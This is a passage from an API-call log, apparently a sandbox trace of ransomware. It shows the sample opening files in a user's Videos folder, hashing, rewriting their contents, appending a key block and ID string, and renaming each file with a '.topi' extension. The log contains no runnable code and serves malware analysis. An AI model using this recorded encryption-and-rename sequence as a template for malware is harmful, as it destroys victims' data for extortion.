| out: hHeap=0x680000) returned 1 [0096.863] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.863] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.863] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14f00) returned 0x9a06a00 [0096.863] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.864] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\PR35tl5T1KTAZk_duC3_.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\pr35tl5t1ktazk_duc3_.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\PR35tl5T1KTAZk_duC3_.mkv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\pr35tl5t1ktazk_duc3_.mkv.topi")) returned 1 [0096.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.865] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.866] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32072510, ftCreationTime.dwHighDateTime=0x1d5c4c8, ftLastAccessTime.dwLowDateTime=0xa79d62e0, ftLastAccessTime.dwHighDateTime=0x1d5c576, ftLastWriteTime.dwLowDateTime=0xa79d62e0, ftLastWriteTime.dwHighDateTime=0x1d5c576, nFileSizeHigh=0x0, nFileSizeLow=0xfe3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wRfVZq32h9d51.mp4", cAlternateFileName="WRFVZQ~1.MP4")) returned 1 [0096.866] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\wRfVZq32h9d51.mp4") returned=".mp4" [0096.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\wRfVZq32h9d51.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\wrfvzq32h9d51.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.867] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65082) returned 1 [0096.867] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.870] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfe14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.870] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.871] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.872] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.872] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.872] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.872] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.873] GetLastError () returned 0x0 [0096.873] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.873] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.873] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.873] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.873] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfe40) returned 0x9a06a00 [0096.873] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02e10 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b50 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02e58 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b98 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.874] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b98 | out: hHeap=0x680000) returned 1 [0096.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4bb0 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4b98 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b98 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.875] GetCurrentThreadId () returned 0x8c4 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8970 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.875] GetCurrentThreadId () returned 0x8c4 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b98 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b80 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4bc8 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b98 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b98 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b98 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b80 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b68 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02e58 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.878] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xfe35, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xfe35, lpOverlapped=0x0) returned 1 [0096.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.879] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfe3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.879] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.879] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.879] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.879] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.879] CloseHandle (hObject=0x6a8) returned 1 [0096.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.881] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\wRfVZq32h9d51.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\wrfvzq32h9d51.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\wRfVZq32h9d51.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\wrfvzq32h9d51.mp4.topi")) returned 1 [0096.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.882] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.883] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe28a1f70, ftCreationTime.dwHighDateTime=0x1d5c18d, ftLastAccessTime.dwLowDateTime=0xc3fece80, 